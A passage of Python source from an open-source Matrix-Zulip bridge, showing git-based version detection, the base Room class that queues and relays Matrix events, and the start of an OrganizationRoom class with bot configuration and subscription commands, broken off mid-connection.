__git_version__ = None
if os.path.exists(module_dir + "/version.txt"):
__version__ = open(module_dir + "/version.txt", encoding="utf-8").read().strip()
if os.path.exists(root_dir + ".git") and shutil.which("git"):
try:
git_env = {
"PATH": os.environ["PATH"],
"HOME": os.environ["HOME"],
"LANG": "C",
"LC_ALL": "C",
}
git_bits = (
subprocess.check_output(
["git", "describe", "--tags"],
stderr=subprocess.DEVNULL,
cwd=root_dir,
env=git_env,
)
.strip()
.decode("ascii")
.split("-")
)
__git_version__ = git_bits[0][1:]
if len(git_bits) > 1:
__git_version__ += f".dev{git_bits[1]}"
if len(git_bits) > 2:
__git_version__ += f"+{git_bits[2]}"
# always override version with git version if we have a valid version number
__version__ = __git_version__
except (subprocess.SubprocessError, OSError):
pass
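# Example of the parsing above: "git describe --tags" prints e.g.
# "v1.2.3-4-gabc1234", which splits on "-" into ["v1.2.3", "4", "gabc1234"]
# and becomes "1.2.3.dev4+gabc1234"; a clean tag "v1.2.3" stays "1.2.3".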
| 2,222 | Python | .py | 60 | 31.1 | 95 | 0.631383 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,590 | room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import logging
import re
from abc import ABC
from collections import defaultdict
from typing import TYPE_CHECKING, Callable, Iterable, Optional
from bidict import bidict
from mautrix.appservice import AppService as MauService
from mautrix.errors.base import IntentError
from mautrix.types import Membership
from mautrix.types.event.type import EventType
from matrixzulipbridge.event_queue import EventQueue
if TYPE_CHECKING:
from mautrix.types import Event, EventID, RoomID, StateEvent, UserID
from matrixzulipbridge.__main__ import BridgeAppService
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ThreadEventID, ZulipTopicName, ZulipUserID
class RoomInvalidError(Exception):
pass
class InvalidConfigError(Exception):
pass
class Room(ABC):
az: MauService
id: "RoomID"
user_id: "UserID"
serv: "BridgeAppService"
members: list["UserID"]
lazy_members: Optional[dict["UserID", str]]
bans: list["UserID"]
displaynames: dict["UserID", str]
thread_last_message: dict["EventID", "EventID"]
threads: bidict["ZulipTopicName", "ThreadEventID"]
send_read_receipt: bool
_mx_handlers: dict[str, list[Callable[[dict], bool]]]
_queue: EventQueue
def __init__(
self,
id: "RoomID",
user_id: "UserID",
serv: "BridgeAppService",
members: list["UserID"],
bans: list["UserID"],
):
self.id = id
self.user_id = user_id
self.serv = serv
self.members = list(members)
self.bans = list(bans) if bans else []
self.lazy_members = None
self.displaynames = {}
self.last_messages = defaultdict(str)
self.thread_last_message = {}
self.threads = bidict()
self.send_read_receipt = True
self._mx_handlers = {}
self._queue = EventQueue(self._flush_events)
# start event queue
if self.id:
self._queue.start()
# we track room members
self.mx_register("m.room.member", self._on_mx_room_member)
self.init()
@classmethod
def init_class(cls, az: MauService):
cls.az = az
async def post_init(self):
pass
def from_config(self, config: dict) -> None:
if "threads" in config:
self.threads = bidict(config["threads"])
if "send_read_receipt" in config:
self.send_read_receipt = config["send_read_receipt"]
def init(self) -> None:
pass
def is_valid(self) -> bool:
return True
def cleanup(self):
self._queue.stop()
def to_config(self) -> dict:
return {
"threads": dict(self.threads),
"send_read_receipt": self.send_read_receipt,
}
async def save(self) -> None:
config = self.to_config()
config["type"] = type(self).__name__
config["user_id"] = self.user_id
await self.az.intent.set_account_data("zulip", config, self.id)
def mx_register(self, type: str, func: Callable[[dict], bool]) -> None:
if type not in self._mx_handlers:
self._mx_handlers[type] = []
self._mx_handlers[type].append(func)
async def on_mx_event(self, event: "Event") -> None:
handlers = self._mx_handlers.get(str(event.type), [self._on_mx_unhandled_event])
for handler in handlers:
await handler(event)
def in_room(self, user_id):
return user_id in self.members
async def on_mx_ban(self, user_id: "UserID") -> None:
pass
async def on_mx_unban(self, user_id: "UserID") -> None:
pass
async def on_mx_leave(self, user_id: "UserID") -> None:
pass
async def _on_mx_unhandled_event(self, event: "Event") -> None:
pass
async def _on_mx_room_member(self, event: "StateEvent") -> None:
if (
event.content.membership in [Membership.LEAVE, Membership.BAN]
and event.state_key in self.members
):
self.members.remove(event.state_key)
if event.state_key in self.displaynames:
del self.displaynames[event.state_key]
if event.state_key in self.last_messages:
del self.last_messages[event.state_key]
if not self.is_valid():
raise RoomInvalidError(
f"Room {self.id} ended up invalid after membership change, returning false from event handler."
)
if event.content.membership == Membership.LEAVE:
if event.prev_content.membership == Membership.BAN:
try:
self.bans.remove(event.state_key)
except ValueError:
pass
await self.on_mx_unban(event.state_key)
else:
await self.on_mx_leave(event.state_key)
if event.content.membership == Membership.BAN:
if event.state_key not in self.bans:
self.bans.append(event.state_key)
await self.on_mx_ban(event.state_key)
if event.content.membership == Membership.JOIN:
if event.state_key not in self.members:
self.members.append(event.state_key)
if event.content.displayname is not None:
self.displaynames[event.state_key] = str(event.content.displayname)
elif event.state_key in self.displaynames:
del self.displaynames[event.state_key]
async def _join(self, user_id: "UserID", nick=None):
await self.az.intent.user(user_id).ensure_joined(self.id, ignore_cache=True)
self.members.append(user_id)
if nick is not None:
self.displaynames[user_id] = nick
async def _flush_events(self, events: Iterable[dict]):
for event in events:
try:
await self._flush_event(event)
except Exception:
logging.exception("Queued event failed")
async def _flush_event(self, event: dict):
if event["type"] == "_join":
if event["user_id"] not in self.members:
await self._join(event["user_id"], event["nick"])
elif event["type"] == "_leave":
if self.lazy_members is not None and event["user_id"] in self.lazy_members:
del self.lazy_members[event["user_id"]]
if event["user_id"] in self.members:
if event["reason"] is not None:
await self.az.intent.user(event["user_id"]).kick_user(
self.id, event["user_id"], event["reason"]
)
else:
await self.az.intent.user(event["user_id"]).leave_room(self.id)
if event["user_id"] in self.members:
self.members.remove(event["user_id"])
if event["user_id"] in self.displaynames:
del self.displaynames[event["user_id"]]
elif event["type"] == "_kick":
if event["user_id"] in self.members:
await self.az.intent.kick_user(
self.id, event["user_id"], event["reason"]
)
self.members.remove(event["user_id"])
if event["user_id"] in self.displaynames:
del self.displaynames[event["user_id"]]
elif event["type"] == "_ensure_zulip_user_id":
await self.serv.ensure_zulip_user_id(
event["organization"],
zulip_user_id=event["zulip_user_id"],
zulip_user=event["zulip_user"],
)
elif event["type"] == "_redact":
await self.az.intent.redact(
room_id=self.id,
event_id=event["event_id"],
reason=event["reason"],
)
elif event["type"] == "_permission":
if len(event["content"]["users"]) == 0:
return # No need to send an empty event
try:
await self.az.intent.set_power_levels(
room_id=self.id,
content=event["content"],
)
except IntentError:
pass
elif "state_key" in event:
intent = self.az.intent
if event["user_id"]:
intent = intent.user(event["user_id"])
await intent.send_state_event(
self.id,
EventType.find(event["type"]),
state_key=event["state_key"],
content=event["content"],
)
else:
bridge_data = event["content"].get("lv.shema.zulipbridge")
if bridge_data is None:
bridge_data = {}
if (
bridge_data.get("type") == "message"
and bridge_data.get("target") == "stream"
):
thread_id = self.threads.get(bridge_data["zulip_topic"])
if thread_id is None:
logging.error(
f"Thread not created for topic: {bridge_data['zulip_topic']}"
)
return
event["content"]["m.relates_to"] = {
"event_id": thread_id,
"rel_type": "m.thread",
}
# https://spec.matrix.org/v1.9/client-server-api/#fallback-for-unthreaded-clients
if thread_id in self.thread_last_message:
event["content"]["m.relates_to"]["is_falling_back"] = True
event["content"]["m.relates_to"]["m.in_reply_to"] = {
"event_id": self.thread_last_message[thread_id]
}
if bridge_data.get("reply_to") is not None:
if "m.relates_to" not in event["content"]:
event["content"]["m.relates_to"] = {}
event["content"]["m.relates_to"]["is_falling_back"] = False
event["content"]["m.relates_to"]["m.in_reply_to"] = {
"event_id": bridge_data.get("reply_to")
}
intent = (
self.az.intent.user(event["user_id"])
if event["user_id"]
else self.az.intent
)
if "zulip_user_id" in bridge_data and "display_name" in bridge_data:
# TODO: Check if the display name is already cached
await intent.set_displayname(bridge_data["display_name"])
# Remove bridge data before sending it to Matrix
# This saves a few bytes!
event["content"].pop("lv.shema.zulipbridge", None)
timestamp = None
if "timestamp" in bridge_data:
timestamp = bridge_data["timestamp"] * 1000
event_type = EventType.find(event["type"])
# Skip creating a new thread if it already exists
if (
bridge_data.get("type") == "topic"
and bridge_data["zulip_topic"] in self.threads
):
return
event_id = await intent.send_message_event(
self.id,
event_type,
event["content"],
timestamp=timestamp,
)
if (
"m.relates_to" in event["content"]
and event["content"]["m.relates_to"].get("rel_type") == "m.thread"
):
self.thread_last_message[
event["content"]["m.relates_to"]["event_id"]
] = event_id
match bridge_data.get("type"):
case "message":
# Is this efficient?
self.messages[str(bridge_data["zulip_message_id"])] = event_id
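                    # NOTE: `messages` (above) and `organization` (below) are
                    # attributes provided by subclasses such as OrganizationRoom;
                    # the Room base class does not define them itself.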
await self.save()
if self.send_read_receipt and self.organization.zulip is not None:
# Send read receipt to Zulip
self.organization.zulip.update_message_flags(
{
"messages": [bridge_data["zulip_message_id"]],
"op": "add",
"flag": "read",
}
)
case "topic":
self.threads[bridge_data["zulip_topic"]] = event_id
await self.save()
# send message to mx user (may be puppeted)
def send_message(
self,
text: str,
user_id: Optional["UserID"] = None,
        formatted: Optional[str] = None,
fallback_html: Optional[str] = None,
thread_id: Optional[str] = None,
custom_data: Optional[dict] = None,
) -> None:
if formatted:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.text",
"format": "org.matrix.custom.html",
"body": text,
"formatted_body": formatted,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
else:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.text",
"body": text,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
if thread_id:
event["content"]["m.relates_to"] = {
"event_id": thread_id,
"rel_type": "m.thread",
}
if custom_data is not None:
event["content"]["lv.shema.zulipbridge"] = custom_data
if "lv.shema.zulipbridge" in event["content"]:
bridge_data: dict = event["content"]["lv.shema.zulipbridge"]
if bridge_data["type"] == "message" and bridge_data["target"] == "stream":
self._ensure_thread_for_topic(bridge_data.copy(), user_id)
self._queue.enqueue(event)
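    # Illustrative sketch (names/values hypothetical): `custom_data` mirrors the
    # "lv.shema.zulipbridge" payload consumed by _flush_event, e.g.:
    #   room.send_message(
    #       "hello",
    #       custom_data={
    #           "type": "message",
    #           "target": "stream",
    #           "zulip_topic": "general chat",   # resolved to a Matrix thread
    #           "zulip_message_id": 12345,       # cached for read receipts
    #           "timestamp": 1700000000,         # seconds, converted to ms
    #       },
    #   )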
def redact(self, event_id: "EventID", reason: Optional[str] = None) -> None:
event = {"type": "_redact", "event_id": event_id, "reason": reason}
self._queue.enqueue(event)
def _ensure_thread_for_topic(
self, bridge_data: dict, mx_user_id: Optional["UserID"] = None
) -> Optional[str]:
zulip_topic = bridge_data["zulip_topic"]
if zulip_topic in self.threads:
return self.threads[zulip_topic]
bridge_data["type"] = "topic"
# Send topic name as a message
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.text",
"body": zulip_topic,
"lv.shema.zulipbridge": bridge_data,
},
"user_id": mx_user_id,
}
self._queue.enqueue(event)
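        # The thread's Matrix event ID is only known once the queued topic
        # message is flushed (see the "topic" case in _flush_event), so there
        # is nothing meaningful to return yet.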
return None
# send emote to mx user (may be puppeted)
def send_emote(
self,
text: str,
user_id: Optional["UserID"] = None,
fallback_html: Optional[str] = None,
) -> None:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.emote",
"body": text,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
self._queue.enqueue(event)
# send notice to mx user (may be puppeted)
def send_notice(
self,
text: str,
user_id: Optional["UserID"] = None,
        formatted: Optional[str] = None,
fallback_html: Optional[str] = None,
) -> None:
if formatted:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.notice",
"format": "org.matrix.custom.html",
"body": text,
"formatted_body": formatted,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
else:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.notice",
"body": text,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
self._queue.enqueue(event)
    # send HTML notice to mx user (may be puppeted)
def send_notice_html(self, text: str, user_id: Optional["UserID"] = None) -> None:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.notice",
"body": re.sub("<[^<]+?>", "", text),
"format": "org.matrix.custom.html",
"formatted_body": text,
},
"user_id": user_id,
}
self._queue.enqueue(event)
def react(
self, event_id: "EventID", text: str, user_id: Optional["UserID"] = None
) -> None:
event = {
"type": "m.reaction",
"content": {
"m.relates_to": {
"event_id": event_id,
"key": text,
"rel_type": "m.annotation",
}
},
"user_id": user_id,
}
self._queue.enqueue(event)
def set_topic(self, topic: str, user_id: Optional["UserID"] = None) -> None:
event = {
"type": "m.room.topic",
"content": {
"topic": topic,
},
"state_key": "",
"user_id": user_id,
}
self._queue.enqueue(event)
def join(self, user_id: "UserID", nick=None, lazy=False) -> None:
event = {
"type": "_join",
"content": {},
"user_id": user_id,
"nick": nick,
"lazy": lazy,
}
self._queue.enqueue(event)
def leave(self, user_id: "UserID", reason: Optional[str] = None) -> None:
event = {
"type": "_leave",
"content": {},
"reason": reason,
"user_id": user_id,
}
self._queue.enqueue(event)
def rename(self, old_nick: str, new_nick: str) -> None:
event = {
"type": "_rename",
"content": {},
"old_nick": old_nick,
"new_nick": new_nick,
}
self._queue.enqueue(event)
def kick(self, user_id: "UserID", reason: str) -> None:
event = {
"type": "_kick",
"content": {},
"reason": reason,
"user_id": user_id,
}
self._queue.enqueue(event)
def ensure_zulip_user_id(
self,
organization: "OrganizationRoom",
zulip_user_id: "ZulipUserID" = None,
zulip_user=None,
):
event = {
"type": "_ensure_zulip_user_id",
"content": {},
"organization": organization,
"zulip_user": zulip_user,
"zulip_user_id": zulip_user_id,
}
self._queue.enqueue(event)
async def sync_permissions(self, permissions: dict):
room_power_levels = await self.az.intent.get_power_levels(
self.id, ensure_joined=False
)
permissions = room_power_levels.users | permissions
if permissions == room_power_levels.users:
logging.debug(f"Nothing chnaged: {permissions=}")
return # Nothing changed
self._queue.enqueue(
{
"type": "_permission",
"content": {
"users": permissions,
},
}
)
| 20,747 | Python | .py | 528 | 27.179924 | 115 | 0.524574 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,591 | organization_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/organization_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import argparse
import asyncio
import datetime
import functools
import html
import json
import logging
import re
from argparse import Namespace
from typing import TYPE_CHECKING, Any, Optional
import zulip
from bidict import bidict
from mautrix.util.bridge_state import BridgeStateEvent
from matrixzulipbridge import __version__
from matrixzulipbridge.command_parse import (
CommandManager,
CommandParser,
CommandParserError,
)
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.personal_room import PersonalRoom
from matrixzulipbridge.room import InvalidConfigError, Room
from matrixzulipbridge.space_room import SpaceRoom
from matrixzulipbridge.stream_room import StreamRoom
# pylint: disable=unused-import
from matrixzulipbridge.under_organization_room import connected
from matrixzulipbridge.zulip import ZulipEventHandler
if TYPE_CHECKING:
from mautrix.types import UserID
from matrixzulipbridge.appservice import AppService
from matrixzulipbridge.types import ZulipUserID
class OrganizationRoom(Room):
# configuration stuff
name: str
connected: bool
fullname: str
api_key: str
email: str
site: str
zulip: "zulip.Client"
zulip_users: dict["ZulipUserID", dict]
zulip_puppet_login: dict["UserID", dict]
zulip_puppets: dict["UserID", "zulip.Client"]
zulip_puppet_user_mxid: bidict["ZulipUserID", "UserID"]
# state
commands: CommandManager
rooms: dict[str, Room]
direct_rooms: dict[frozenset["ZulipUserID"], "DirectRoom"]
connecting: bool
backoff: int
backoff_task: Any
connected_at: int
space: SpaceRoom
post_init_done: bool
disconnect: bool
organization: "OrganizationRoom"
profile: dict
server: dict
messages: dict[str, str]
permissions: dict[str, str]
zulip_handler: "ZulipEventHandler"
max_backfill_amount: int
relay_moderation: bool
deactivated_users: set["ZulipUserID"]
def init(self):
self.name = None
self.connected = False
self.fullname = None
self.backoff = 0
self.backoff_task = None
self.connected_at = 0
self.api_key = None
self.email = None
self.site = None
self.zulip_users = {}
self.zulip_puppet_login = {}
self.zulip_puppets = {}
self.zulip_puppet_user_mxid = bidict()
self.commands = CommandManager()
self.zulip = None
self.rooms = {}
self.direct_rooms = {}
self.connlock = asyncio.Lock()
self.disconnect = True
self.space = None
self.organization = self
self.profile = None
self.server = None
self.messages = {}
self.permissions = {}
self.zulip_handler = None
self.max_backfill_amount = 100
self.relay_moderation = True
self.deactivated_users = set()
cmd = CommandParser(
prog="FULLNAME",
description="set/change full name",
epilog=(
"You can always see your current full name on the organization without arguments.\n"
),
)
cmd.add_argument("fullname", nargs="?", help="new full name")
self.commands.register(cmd, self.cmd_fullname)
cmd = CommandParser(
prog="SITE",
description="set Zulip site",
)
cmd.add_argument("site", nargs="?", help="new site")
self.commands.register(cmd, self.cmd_site)
cmd = CommandParser(
prog="EMAIL",
description="set Zulip bot email",
)
cmd.add_argument("email", nargs="?", help="new bot email")
self.commands.register(cmd, self.cmd_email)
cmd = CommandParser(
prog="APIKEY",
description="set Zulip bot api key",
)
cmd.add_argument("api_key", nargs="?", help="new API key")
self.commands.register(cmd, self.cmd_apikey)
cmd = CommandParser(
prog="CONNECT",
description="connect to organization",
epilog=(
"When this command is invoked the connection to this organization will be persisted across disconnects and"
" bridge restart.\n"
"Only if the server KILLs your connection it will stay disconnected until CONNECT is invoked again.\n"
"\n"
"If you want to cancel automatic reconnect you need to issue the DISCONNECT command.\n"
),
)
self.commands.register(cmd, self.cmd_connect)
cmd = CommandParser(
prog="DISCONNECT",
description="disconnect from organization",
epilog=(
"In addition to disconnecting from an active organization connection this will also cancel any automatic"
"reconnection attempt.\n"
),
)
self.commands.register(cmd, self.cmd_disconnect)
cmd = CommandParser(prog="RECONNECT", description="reconnect to organization")
self.commands.register(cmd, self.cmd_reconnect)
cmd = CommandParser(
prog="SUBSCRIBE",
description="bridge a stream",
epilog=(
"Manually subscribe to a stream and bridge it\n"
"\n"
"Any subscriptions will be persisted between reconnects.\n"
"\n"
"Specifying a room will make the bridge join that room, instead of creating a new one\n"
),
)
cmd.add_argument("stream", help="target stream")
cmd.add_argument(
"backfill", nargs="?", help="number of messages to backfill", type=int
)
cmd.add_argument("room", nargs="?", help="room ID")
self.commands.register(cmd, self.cmd_subscribe)
cmd = CommandParser(
prog="UNSUBSCRIBE",
description="unbridge a stream and leave the room",
)
cmd.add_argument("stream", help="target stream")
self.commands.register(cmd, self.cmd_unsubscribe)
cmd = CommandParser(
prog="SPACE", description="join/create a space for this organization"
)
self.commands.register(cmd, self.cmd_space)
cmd = CommandParser(
prog="SYNCPERMISSIONS", description="resync all permissions"
)
self.commands.register(cmd, self.cmd_syncpermissions)
cmd = CommandParser(prog="PROFILE", description="fetch our Zulip profile")
self.commands.register(cmd, self.cmd_profile)
cmd = CommandParser(
prog="ROOM",
description="run a room command from organization room",
epilog=(
"Try 'ROOM #foo' to get the list of commands for a room."
"If a command generates Zulip replies in a bouncer room they will appear in the room itself."
),
)
cmd.add_argument("target", help="Zulip stream name")
cmd.add_argument(
"command", help="Command and arguments", nargs=argparse.REMAINDER
)
self.commands.register(cmd, self.cmd_room)
cmd = CommandParser(
prog="STATUS", description="show current organization status"
)
self.commands.register(cmd, self.cmd_status)
cmd = CommandParser(
prog="BACKFILL",
description="set the default maximum amount of backfilled messages (0 to disable backfilling)",
)
cmd.add_argument("amount", nargs="?", help="new amount")
cmd.add_argument(
"--update", action="store_true", help="also set this to all existing rooms"
)
cmd.add_argument("--now", action="store_true", help="start backfilling now")
self.commands.register(cmd, self.cmd_backfill)
cmd = CommandParser(
prog="PERSONALROOM",
description="create a personal room",
)
self.commands.register(cmd, self.cmd_personalroom)
cmd = CommandParser(
prog="RELAYMODERATION",
description="Whether to relay bans to Zulip",
epilog="When a user is banned in one room, their Zulip account is deactivated and removed from all rooms.",
)
group = cmd.add_mutually_exclusive_group()
group.add_argument(
"--on",
help="turn relaying moderation on",
action="store_true",
)
group.add_argument(
"--off",
help="turn relaying moderation off",
action="store_true",
)
self.commands.register(cmd, self.cmd_relaymoderation)
self.mx_register("m.room.message", self.on_mx_message)
@staticmethod
async def create(serv: "AppService", organization: dict, user_id: "UserID", name):
room_id = await serv.create_room(
name, f"Organization room for {organization['name']}", [user_id]
)
room = OrganizationRoom(
room_id, user_id, serv, [serv.user_id, user_id], bans=[]
)
room.from_config(organization)
serv.register_room(room)
room.space = await SpaceRoom.create(room, [r.id for r in room.rooms.values()])
# calls the api and attaches rooms
await room.space.create_finalize()
await room.space.attach(room.id)
await room.save()
await room.show_help()
return room
def from_config(self, config: dict):
if "name" in config:
self.name = config["name"]
else:
raise InvalidConfigError("No name key in config for OrganizationRoom")
if "api_key" in config and config["api_key"]:
self.api_key = config["api_key"]
if "email" in config and config["email"]:
self.email = config["email"]
if "site" in config and config["site"]:
self.site = config["site"]
if "messages" in config and config["messages"]:
self.messages = config["messages"]
if "max_backfill_amount" in config and config["max_backfill_amount"]:
self.max_backfill_amount = config["max_backfill_amount"]
if "zulip_puppet_login" in config and config["zulip_puppet_login"]:
self.zulip_puppet_login = config["zulip_puppet_login"]
def to_config(self) -> dict:
return {
"name": self.name,
"api_key": self.api_key,
"email": self.email,
"site": self.site,
"messages": self.messages,
"max_backfill_amount": self.max_backfill_amount,
"zulip_puppet_login": self.zulip_puppet_login,
}
def is_valid(self) -> bool:
if self.name is None:
return False
        # we require the user to be in the organization room or be connected with streams or DMs
if not self.in_room(self.user_id):
# if not connected (or trying to) we can clean up
if not self.connected:
return False
# only if post_init has been done and we're connected with no rooms clean up
if self.post_init_done and self.connected and len(self.rooms) == 0:
return False
return True
def cleanup(self) -> None:
logging.debug(f"Network {self.id} cleaning up")
# prevent reconnecting ever again
self.connected = False
self.disconnect = True
if self.backoff_task:
self.backoff_task.cancel()
self.backoff_task = None
logging.debug("... cancelled backoff task")
if self.zulip:
self.zulip = None
if self.space:
self.serv.unregister_room(self.space.id)
self.space.cleanup()
asyncio.ensure_future(
self.serv.leave_room(self.space.id, self.space.members)
)
logging.debug("... cleaned up space")
super().cleanup()
async def show_help(self):
self.send_notice_html(
f"Welcome to the organization room for <b>{html.escape(self.name)}</b>!"
)
try:
return await self.commands.trigger("HELP")
except CommandParserError as e:
return self.send_notice(str(e))
async def on_mx_message(self, event) -> None:
if str(event.content.msgtype) != "m.text" or event.sender == self.serv.user_id:
return
# ignore edits
if event.content.get_edit():
return
try:
lines = event.content.body.split("\n")
command = lines.pop(0)
tail = "\n".join(lines) if len(lines) > 0 else None
await self.commands.trigger(command, tail)
except CommandParserError as e:
self.send_notice(str(e))
async def cmd_connect(self, _args) -> None:
await self.connect()
@connected # pylint: disable=used-before-assignment
async def cmd_disconnect(self, _args) -> None:
self.disconnect = True
if self.backoff_task:
self.backoff_task.cancel()
self.backoff_task = None
self.backoff = 0
self.connected_at = 0
if self.connected:
self.connected = False
await self.save()
if self.zulip:
self.zulip = None
self.send_notice("Disconnected")
async def cmd_reconnect(self, _args) -> None:
await self.cmd_disconnect(Namespace())
await self.cmd_connect(Namespace())
@connected
async def cmd_subscribe(self, args) -> None:
stream = args.stream
for room in self.rooms.values():
if not isinstance(room, StreamRoom):
continue
if stream.lower() == room.name:
self.send_notice(f"Stream {stream} already exists at {room.id}.")
return
self.zulip.add_subscriptions([{"name": stream}])
room = await StreamRoom.create(
organization=self,
name=stream,
backfill=args.backfill,
room_id=args.room,
)
await room.backfill_messages()
@connected
async def cmd_unsubscribe(self, args) -> None:
stream = args.stream.lower()
room = None
for r in self.rooms.values():
if not isinstance(r, StreamRoom):
continue
if r.name.lower() == stream:
room = r
break
if room is None:
self.send_notice("No room with that name exists.")
return
self.serv.unregister_room(room.id)
room.cleanup()
await self.serv.leave_room(room.id, room.members)
del self.rooms[room.stream_id]
self.zulip.remove_subscriptions([stream])
self.send_notice(f"Unsubscribed from {stream} and removed room {room.id}.")
def get_fullname(self):
if self.fullname:
return self.fullname
return self.profile["full_name"]
async def cmd_fullname(self, args) -> None:
if args.fullname is None:
fullname = self.get_fullname()
if self.zulip and self.zulip.has_connected:
self.send_notice(f"Full name: {fullname}")
return
if self.zulip and self.zulip.has_connected:
self.zulip.update_user_by_id(
self.profile["user_id"], full_name=args.fullname
)
self.fullname = args.fullname
self.send_notice(f"Full name set to {self.fullname}")
async def cmd_site(self, args) -> None:
if not args.site:
self.send_notice(f"Zulip site is: {self.site}")
return
self.site = args.site
await self.save()
self.send_notice(f"Zulip site set to {self.site}")
async def cmd_email(self, args) -> None:
if not args.email:
self.send_notice(f"Bot email is: {self.email}")
return
self.email = args.email
await self.save()
self.send_notice(f"Bot email set to {self.email}")
async def cmd_apikey(self, args) -> None:
if not args.api_key:
self.send_notice(f"Bot API key is {'not ' if self.api_key else ''}set")
return
self.api_key = args.api_key
await self.save()
self.send_notice("Bot API Key changed")
async def cmd_profile(self, _args) -> None:
self.profile = self.zulip.get_profile()
self.send_notice(json.dumps(self.profile, indent=4))
async def cmd_room(self, args) -> None:
target = args.target.lower()
room = None
for r in self.rooms.values():
if not isinstance(r, StreamRoom):
continue
if r.name.lower() == target:
room = r
if not room:
self.send_notice(f"No room for {args.target}")
return
if len(args.command) == 0:
args.command = ["HELP"]
await room.commands.trigger_args(args.command, forward=True)
async def cmd_status(self, _args) -> None:
if self.connected_at > 0:
conntime = asyncio.get_running_loop().time() - self.connected_at
conntime = str(datetime.timedelta(seconds=int(conntime)))
self.send_notice(f"Connected for {conntime}")
else:
self.send_notice("Not connected to server.")
dms = []
streams = []
for room in self.rooms.values():
if isinstance(room, StreamRoom):
streams.append(room.name)
for dm_room in self.direct_rooms.values():
dms.append(dm_room.name)
if len(streams) > 0:
self.send_notice(f"Streams: #{', #'.join(streams)}")
if len(dms) > 0:
self.send_notice(f"Open DMs: {len(dms)}")
async def cmd_space(self, _args) -> None:
if self.space is None:
# sync create to prevent race conditions
self.space = SpaceRoom.create(
self, [room.id for room in self.rooms.values()]
)
# calls the api and attaches rooms
self.send_notice("Creating space and inviting you to it.")
await self.space.create_finalize()
else:
self.send_notice(f"Space already exists ({self.space.id}).")
async def cmd_syncpermissions(self, _args) -> None:
await self._sync_permissions()
self.send_notice("Permissions synched successfully")
async def cmd_backfill(self, args) -> None:
if args.amount:
self.max_backfill_amount = int(args.amount)
await self.save()
if args.update:
for room in self.rooms.values():
if not isinstance(room, DirectRoom):
continue
room.max_backfill_amount = self.max_backfill_amount
await room.save()
self.send_notice(
f"Set maximum backfill amount to {self.max_backfill_amount} and updated all rooms"
)
else:
self.send_notice(
f"Maximum backfill amount is set to: {self.max_backfill_amount}"
)
if args.now:
await self.backfill_messages()
async def cmd_personalroom(self, _args) -> None:
await PersonalRoom.create(self, self.user_id)
self.send_notice("Personal room created")
async def cmd_relaymoderation(self, args) -> None:
if args.on:
self.relay_moderation = True
await self.save()
elif args.off:
self.relay_moderation = False
await self.save()
self.send_notice(
f"Relaying moderation is {'enabled' if self.relay_moderation else 'disabled'}",
)
async def connect(self) -> None:
if not self.is_valid():
logging.warning(
"Trying to connect an invalid organization {self.id}, this is likely a dangling organization."
)
return
if self.connlock.locked():
self.send_notice("Already connecting.")
return
async with self.connlock:
if self.zulip and self.connected:
self.send_notice("Already connected.")
return
self.disconnect = False
await self._connect()
async def post_init(self) -> None:
# attach loose sub-rooms to us
for room_type in [DirectRoom, StreamRoom, PersonalRoom]:
for room in self.serv.find_rooms(room_type, organization_id=self.id):
room.organization = self
logging.debug(f"{self.id} attaching {room.id}")
match room:
case StreamRoom():
self.rooms[room.stream_id] = room
case DirectRoom():
self.direct_rooms[frozenset(room.recipient_ids)] = room
case _:
self.rooms[room.id] = room
logging.debug(self.direct_rooms)
self.post_init_done = True
async def _connect(self) -> None:
if not self.site:
self.send_notice("Zulip site is not set!")
return
if not self.email:
self.send_notice("Bot email is not set!")
return
if not self.api_key:
self.send_notice("Bot API key is not set!")
return
# force cleanup
if self.zulip:
self.zulip = None
while not self.disconnect:
if self.name not in self.serv.config["organizations"]:
self.send_notice(
"This organization does not exist on this bridge anymore."
)
return
try:
asyncio.ensure_future(
self.serv.push_bridge_state(
BridgeStateEvent.CONNECTING, remote_id=self.name
)
)
self.zulip = zulip.Client(
